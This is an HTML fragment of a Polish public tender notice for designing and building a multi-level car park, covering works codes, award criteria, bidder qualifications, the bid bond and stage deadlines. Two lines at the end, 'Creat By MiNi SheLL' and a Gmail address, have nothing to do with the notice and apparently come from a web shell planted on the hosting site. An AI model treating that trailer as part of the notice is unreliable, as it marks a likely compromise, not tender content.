telekomunikacyjnych</p> <p class="mb-0">45314120-8 - Instalowanie abonenckich central telefonicznych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45323000-7 - Roboty w zakresie izolacji dźwiękoszczelnych</p> <p class="mb-0">45324000-4 - Roboty w zakresie okładziny tynkowej</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45341000-9 - Wznoszenie płotów</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45350000-5 - Instalacje mechaniczne</p> <p class="mb-0">45351000-2 - Mechaniczne instalacje inżynieryjne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45432000-4 - Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45441000-0 - Roboty szklarskie</p> <p class="mb-0">45442000-7 - Nakładanie powierzchni kryjących</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/> 1) CENA (C) – waga kryterium 60 %;<br/> 2) GWARANCJA i REKOJMIA (G) – waga kryterium 40 %.<br/> 1% = 1 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">WYDŁUŻENIE OKRESU GWARANCJI I REKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego poniżej warunki udziału w postępowaniu.<br/> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/> 1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/> 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/> 3) sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/> a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia, na sumę ubezpieczenia (sumę gwarancyjną) nie mniejszą niż <br/>10 000 000,00 zł (słownie: dziesięć milionów złotych 00/100).<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek, o którym mowa w zdaniu powyżej musi być spełniony w całości przez co najmniej jeden podmiot. Co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi indywidualnie posiadać ubezpieczenie od odpowiedzialności cywilnej na sumę gwarancyjną nie mniejszą niż wskazana przez zamawiającego w zdaniu powyżej.<br/> b) Posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 10 000 000,00 PLN. <br/><br/> 4) zdolności technicznej lub zawodowej :<br/> Wykonawca spełni warunek, jeżeli wykaże, że:<br/> a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością:<br/> ▪ co najmniej jedno zamówienie w systemie „zaprojektuj i wybuduj” polegające na wykonanie dokumentacji projektowej oraz wykonaniu robót budowlanych w zakresie budowy parkingu wielopoziomowego lub budowa budynku/obiektu którego częścią był parking wielopoziomowy lub podziemny z minimum 100 miejscami postojowymi<br/>LUB<br/><br/> ▪ co najmniej jedno zamówienie polegające na wykonaniu dokumentacji projektowej (zatwierdzonej ostateczną decyzją pozwolenia na budowę) na: budowę parkingu wielopoziomowego lub budowę budynku/obiektu którego częścią był parking wielopoziomowy lub podziemny z minimum 100 miejscami postojowymi<br/>ORAZ<br/> ▪ co najmniej jedno zamówienie polegające na wykonaniu robót budowlanych związanych z budową parkingu wielopoziomowego lub budowa budynku/obiektu którego częścią był parking wielopoziomowy lub podziemny z minimum 100 miejscami postojowymi.<br/>Uwaga: w celu spełnienia wymagań wynikających z treści art. 118 ust. 2 Pzp w sytuacji, gdy warunek powyższy będzie spełniony nie przez wykonawcę lub wspólnika konsorcjum, a przez podmiot udostępniający wykonawcy swoje zasoby (podmiot trzeci), to ten podmiot musi być podwykonawcą w realizacji umowy.<br/>b) dysponuje osobami skierowanymi do realizacji zamówienia, umożliwiającymi jego realizację na odpowiednim poziomie jakości tj. m. in.:<br/> • co najmniej jedną osobą pełniącą funkcję Projektanta w specjalności architektonicznej, posiadającą uprawnienia do projektowania w specjalności architektonicznej bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/> • co najmniej jedną osobą pełniącą funkcję Projektanta w specjalności konstrukcyjno-budowlanej, posiadającą uprawnienia do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/> • co najmniej jedną osoba pełniącą funkcję Projektanta w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/> • co najmniej jedną osobą pełniącą funkcję Projektanta w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/> • co najmniej jedną osobą pełniącą funkcję Projektanta w specjalności drogowej, posiadającą uprawnienia do projektowania w specjalności drogowej bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/> • co najmniej jedną osobą pełniącą funkcję Projektanta w specjalności teletechnicznej, posiadającą uprawnienia do projektowania w specjalności teletechnicznej bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/> • co najmniej jedną osobą pełniąca funkcję Kierownika budowy w specjalności konstrukcyjno-budowlanej, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/> • co najmniej jedną osobą pełniącą funkcję Kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/> • co najmniej jedną osobą pełniącą funkcję Kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylayjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/> • co njamniej jedną osobą pełniącą funkcję Kierownika robót w specjalności teletechnicznej, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności teletechnicznej bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/> • co najmniej jedną osobą pełniącą funkcję Kierownika robót w specjalności drogowej, posiadająca uprawnienia budowlane do kierowaina robotami budowlanymi w specjalności drogowej bez ograniczeń określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Uwaga I: Projektanci oraz kierownicy powinni posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2025 r. poz. 418 z późn. zm.) oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj. Dz. U. z 2023 r. poz. 334 z późn. zm.).<br/>Uwaga II: W przypadku gdy na etapie projektowania i/lub wykonania zadania będzie konieczność posiadania projektanta/ów i/lub kierownika/ów budowy w specjalności innej, np. obiektów budowlanych, sieci, przyłączy itp., Wykonawca zabezpieczy osoby posiadające stosowne uprawnienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">▪ wykaz usług (potwierdzający warunek udziału, o którym mowa w Rozdziale VII ust. 2 pkt 4 lit. a) tiret pierwszy) − wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – załącznik nr 5a do SWZ;<br/> ▪ wykaz robót (potwierdzający warunek udziału, o którym mowa w Rozdziale VII ust. 2 pkt 4 lit. a) tiret drugi) – wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - załącznik nr 5b do SWZ;<br/> ▪ wykaz osób (potwierdzający spełnienie warunku udziału w postępowaniu określony w Rozdziale VII ust. 2. pkt 4 lit. b)) – skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 5c do SWZ;<br/> ▪ dokumentów potwierdzających że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/> ▪ informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>UWAGA 1: Wykaz usług, wykaz robót i wykaz osób będzie musiał być sporządzony i podpisany przez ten podmiot, który spełnia dany warunek, czyli odpowiednio przez: wykonawcę lub wspólnika konsorcjum, lub podmiot udostępniający zasoby. <br/>UWAGA 2: Wykonawca, który polega na zdolnościach innych podmiotów w celu spełnienia powyższych warunków musi wraz z ofertą złożyć zobowiązanie tych podmiotów, o którym mowa w Rozdz. X pkt 3. <br/>UWAGA 3: Jeżeli, Wykonawca, powołuje się na doświadczenie w realizacji robót budowlanych / dostaw wykonywanych wspólnie z innymi Wykonawcami, wykaz ma dotyczyć robót budowlanych / dostaw, w których wykonywaniu Wykonawca bezpośrednio uczestniczył.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> ZGODNIE Z ROZDZ. XIX SWZ - <br/><br/>WADIUM<br/><br/> 11. Oferta zawierająca całość przedmiotu zamówienia powinna być zabezpieczona wadium w wysokości: 200 000,00 zł (dwieście tysięcy złotych 00/100).<br/> 12. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/> 13. Wadium wnosi się w następujących formach:<br/> a) pieniądzu,<br/> b) gwarancjach bankowych,<br/> c) gwarancjach ubezpieczeniowych,<br/> d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku – o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2025 r. poz. 98).<br/> 14. Wadium wnoszone w formie gwarancji bankowej, gwarancji ubezpieczeniowej, poręczenia bankowego powinno zawierać następujące elementy:<br/> a) określenie terminu obowiązywania poręczenia lub gwarancji przez cały okres związania ofertą;<br/> b) określenie kwoty poręczenia lub gwarancji;<br/> c) wskazanie gwaranta poręczenia lub gwarancji;<br/> d) wskazanie beneficjenta poręczenia lub gwarancji;<br/> e) zapis, iż poręczyciel / gwarant zobowiązuje się bezwarunkowo tj. na pierwsze żądanie, do zapłaty pełnej kwoty zabezpieczenia na rzecz beneficjenta;<br/> f) nieodwołalność poręczenia lub gwarancji.<br/> 15. W przypadku wniesienia wadium w formie pieniężnej należy je wpłacić przelewem na konto Zamawiającego:<br/>nr rachunku 49 8591 0007 0200 0013 8080 0014<br/>powołując się na nazwę postępowania, nr sprawy oraz podając nazwę banku i numer swojego konta, na które należy zwrócić wadium.<br/> 16. Za skuteczne wniesione wadium w pieniądzu, Zamawiający uważa wadium, które w oznaczonym terminie (przed upływem terminu składania ofert lub wniosków) znajdzie się na rachunku bankowym Zamawiającego (decyduje data uznania rachunku Zamawiającego).<br/> 17. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/> 18. Zamawiający dopuszcza złożenie wadium w kilku formach przy jednoczesnym spełnieniu powyższych obowiązków.<br/> 19. Zasady zwrotu i zatrzymania wadium określa PZP.<br/> 20. Złożenie przez Wykonawcę wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 PZP powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/> 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/> 3. W przypadku, o którym mowa w art. 117 ust. 2 i 3 Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które prace wykonają poszczególni wykonawcy.<br/> 4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ZGODNIE Z ZAPISAMI WZORU UMOWY -ZAŁĄCZNIK NR 6 DO SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/miechow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-28 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dla Etapu I:<br/>1) Rozpoczęcie - po zawarciu umowy.<br/>2) Zakończenie - do 11 miesięcy od dnia podpisania umowy, z zastrzeżeniem, że Wykonawca<br/>zobowiązany jest do przedłożenia Zamawiającemu koncepcji projektowej do akceptacji w terminie<br/>do 3 miesięcy od dnia podpisania umowy.<br/>Dla Etapu II:<br/>1) Rozpoczęcie – po uzyskaniu decyzji umożliwiającej rozpoczęcie robót budowlanych i dokonania<br/>zgłoszenia rozpoczęcia budowy w organie Nadzoru budowlanego.<br/>2) Zakończenie - do dnia 31.12.2026 roku, z zastrzeżeniem, iż Wykonawca upoważniony jest do<br/>przystąpienia do Etapu II, jeżeli uprzednio uzyska decyzję umożliwiającą rozpoczęcie robót<br/>budowlanych, która objęta jest Etapem I.<br/>Dla Etapu III:<br/>1) Rozpoczęcie – 01.01.2027 rok<br/>2) Zakończenie – do 22 miesięcy od dnia podpisania umowy, jednakże nie dłużej niż do dnia<br/>01.07.2027 roku (wraz z uzyskaniem decyzji na użytkowanie)

Creat By MiNi SheLL
Email: jattceo@gmail.com